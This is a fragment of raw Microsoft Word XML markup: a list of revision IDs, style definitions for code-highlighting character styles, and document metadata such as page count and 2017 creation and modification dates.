    <w:rsid w:val="00747614"/>
    <w:rsid w:val="007557AF"/>
    <w:rsid w:val="00774D01"/>
    <w:rsid w:val="00784C13"/>
    <w:rsid w:val="007851EB"/>
    <w:rsid w:val="007869DE"/>
    <w:rsid w:val="00796177"/>
    <w:rsid w:val="007968E5"/>
    <w:rsid w:val="00797330"/>
    <w:rsid w:val="007A1AD9"/>
    <w:rsid w:val="007A6262"/>
    <w:rsid w:val="007D3E69"/>
    <w:rsid w:val="007D4FDC"/>
    <w:rsid w:val="007E1027"/>
    <w:rsid w:val="007E4161"/>
    <w:rsid w:val="00802A79"/>
    <w:rsid w:val="008038D9"/>
    <w:rsid w:val="00806D9B"/>
    <w:rsid w:val="00811012"/>
    <w:rsid w:val="008128DF"/>
    <w:rsid w:val="00814E68"/>
    <w:rsid w:val="008253EE"/>
    <w:rsid w:val="00826834"/>
    <w:rsid w:val="00827538"/>
    <w:rsid w:val="008318BE"/>
    <w:rsid w:val="008344BF"/>
    <w:rsid w:val="00835AF4"/>
    <w:rsid w:val="0086014E"/>
    <w:rsid w:val="00872910"/>
    <w:rsid w:val="00881F4A"/>
    <w:rsid w:val="0088683E"/>
    <w:rsid w:val="00895188"/>
    <w:rsid w:val="008B675E"/>
    <w:rsid w:val="008D1C83"/>
    <w:rsid w:val="008D55B6"/>
    <w:rsid w:val="008E2C97"/>
    <w:rsid w:val="008E4DE1"/>
    <w:rsid w:val="008F089B"/>
    <w:rsid w:val="00902028"/>
    <w:rsid w:val="00903F6D"/>
    <w:rsid w:val="009216D7"/>
    <w:rsid w:val="009302D3"/>
    <w:rsid w:val="00932546"/>
    <w:rsid w:val="0094154E"/>
    <w:rsid w:val="009618BE"/>
    <w:rsid w:val="00965FD8"/>
    <w:rsid w:val="00971F88"/>
    <w:rsid w:val="00985158"/>
    <w:rsid w:val="009861E0"/>
    <w:rsid w:val="009930D9"/>
    <w:rsid w:val="009A2534"/>
    <w:rsid w:val="009B4BB6"/>
    <w:rsid w:val="009D414D"/>
    <w:rsid w:val="009D699E"/>
    <w:rsid w:val="009E3B80"/>
    <w:rsid w:val="009E44C3"/>
    <w:rsid w:val="009E6690"/>
    <w:rsid w:val="00A15C24"/>
    <w:rsid w:val="00A17C56"/>
    <w:rsid w:val="00A220D0"/>
    <w:rsid w:val="00A418D6"/>
    <w:rsid w:val="00A44A05"/>
    <w:rsid w:val="00A45B45"/>
    <w:rsid w:val="00A5774D"/>
    <w:rsid w:val="00A62CD5"/>
    <w:rsid w:val="00A6556A"/>
    <w:rsid w:val="00A6586E"/>
    <w:rsid w:val="00A726D5"/>
    <w:rsid w:val="00A752BA"/>
    <w:rsid w:val="00A7661E"/>
    <w:rsid w:val="00A82462"/>
    <w:rsid w:val="00A83AAD"/>
    <w:rsid w:val="00A96F2A"/>
    <w:rsid w:val="00AB77EB"/>
    <w:rsid w:val="00AB7DFB"/>
    <w:rsid w:val="00AC0E1B"/>
    <w:rsid w:val="00AC10F8"/>
    <w:rsid w:val="00AC2C49"/>
    <w:rsid w:val="00AC3366"/>
    <w:rsid w:val="00AC4AFA"/>
    <w:rsid w:val="00AC5323"/>
    <w:rsid w:val="00AD1EA9"/>
    <w:rsid w:val="00AE3A87"/>
    <w:rsid w:val="00AE5EEB"/>
    <w:rsid w:val="00AE6350"/>
    <w:rsid w:val="00AE7C94"/>
    <w:rsid w:val="00AF0572"/>
    <w:rsid w:val="00AF1B34"/>
    <w:rsid w:val="00AF3765"/>
    <w:rsid w:val="00B050C4"/>
    <w:rsid w:val="00B05640"/>
    <w:rsid w:val="00B15A98"/>
    <w:rsid w:val="00B1619B"/>
    <w:rsid w:val="00B22CE0"/>
    <w:rsid w:val="00B32C57"/>
    <w:rsid w:val="00B353A9"/>
    <w:rsid w:val="00B4174C"/>
    <w:rsid w:val="00B46B2A"/>
    <w:rsid w:val="00B5102F"/>
    <w:rsid w:val="00B66E40"/>
    <w:rsid w:val="00B71B93"/>
    <w:rsid w:val="00B83BF9"/>
    <w:rsid w:val="00B843CF"/>
    <w:rsid w:val="00B85D77"/>
    <w:rsid w:val="00B97B2B"/>
    <w:rsid w:val="00BA6A9C"/>
    <w:rsid w:val="00BB792B"/>
    <w:rsid w:val="00BC2112"/>
    <w:rsid w:val="00BC62AD"/>
    <w:rsid w:val="00BD31D0"/>
    <w:rsid w:val="00BD6CAF"/>
    <w:rsid w:val="00BF3C6B"/>
    <w:rsid w:val="00BF5226"/>
    <w:rsid w:val="00BF7A60"/>
    <w:rsid w:val="00C03EDA"/>
    <w:rsid w:val="00C15709"/>
    <w:rsid w:val="00C20D7B"/>
    <w:rsid w:val="00C22606"/>
    <w:rsid w:val="00C26E54"/>
    <w:rsid w:val="00C40FE1"/>
    <w:rsid w:val="00C42483"/>
    <w:rsid w:val="00C47244"/>
    <w:rsid w:val="00C72704"/>
    <w:rsid w:val="00C755D4"/>
    <w:rsid w:val="00C769E4"/>
    <w:rsid w:val="00C7753A"/>
    <w:rsid w:val="00CA203D"/>
    <w:rsid w:val="00CA686B"/>
    <w:rsid w:val="00CC4FA1"/>
    <w:rsid w:val="00CD36B6"/>
    <w:rsid w:val="00CE3E8D"/>
    <w:rsid w:val="00CF0D5D"/>
    <w:rsid w:val="00D04AC6"/>
    <w:rsid w:val="00D16008"/>
    <w:rsid w:val="00D22821"/>
    <w:rsid w:val="00D23050"/>
    <w:rsid w:val="00D25F04"/>
    <w:rsid w:val="00D401DB"/>
    <w:rsid w:val="00D4044B"/>
    <w:rsid w:val="00D5160F"/>
    <w:rsid w:val="00D52888"/>
    <w:rsid w:val="00D54BD7"/>
    <w:rsid w:val="00D601F2"/>
    <w:rsid w:val="00D67DE0"/>
    <w:rsid w:val="00D7078E"/>
    <w:rsid w:val="00D7618B"/>
    <w:rsid w:val="00D83B48"/>
    <w:rsid w:val="00D95100"/>
    <w:rsid w:val="00D97DA6"/>
    <w:rsid w:val="00DA4948"/>
    <w:rsid w:val="00DB64E3"/>
    <w:rsid w:val="00DB6530"/>
    <w:rsid w:val="00DB77DD"/>
    <w:rsid w:val="00DC6800"/>
    <w:rsid w:val="00DD60D0"/>
    <w:rsid w:val="00DE0905"/>
    <w:rsid w:val="00DE64BA"/>
    <w:rsid w:val="00DF4BFF"/>
    <w:rsid w:val="00E1345C"/>
    <w:rsid w:val="00E25F66"/>
    <w:rsid w:val="00E502E5"/>
    <w:rsid w:val="00E63F30"/>
    <w:rsid w:val="00E8057F"/>
    <w:rsid w:val="00E86E9B"/>
    <w:rsid w:val="00E93900"/>
    <w:rsid w:val="00E95FA3"/>
    <w:rsid w:val="00EA7B09"/>
    <w:rsid w:val="00EB5063"/>
    <w:rsid w:val="00EB7602"/>
    <w:rsid w:val="00EC0221"/>
    <w:rsid w:val="00EC0B7F"/>
    <w:rsid w:val="00ED539B"/>
    <w:rsid w:val="00EE5971"/>
    <w:rsid w:val="00F0693D"/>
    <w:rsid w:val="00F11D5C"/>
    <w:rsid w:val="00F37EA5"/>
    <w:rsid w:val="00F4020D"/>
    <w:rsid w:val="00F60230"/>
    <w:rsid w:val="00F6738F"/>
    <w:rsid w:val="00F76CD2"/>
    <w:rsid w:val="00F77178"/>
    <w:rsid w:val="00F81D59"/>
    <w:rsid w:val="00F9498D"/>
    <w:rsid w:val="00FA1CD6"/>
    <w:rsid w:val="00FC1F0E"/>
    <w:rsid w:val="00FD3B4C"/>
    <w:rsid w:val="00FE7342"/>
    <w:rsid w:val="00FE7380"/>
    <w:rsid w:val="00FF06AC"/>
    <w:rsid w:val="00FF1063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7B1E0-F1FF-4E5D-94C3-B2380476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9211BF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9211BF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134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3482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34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3482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342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427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3427B"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ">
    <w:name w:val="typ"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00542673"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00542673"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00542673"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit">
    <w:name w:val="lit"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00542673"/>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="000D3F01"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0054488D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00797330"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C7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B172-D0A8-4BCC-9D24-EB81C386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19</Pages>
  <Words>3678</Words>
  <Characters>20965</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>174</Lines>
  <Paragraphs>49</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2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ery</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>tmp</cp:lastModifiedBy>
  <cp:revision>321</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-09T06:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-10T15:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>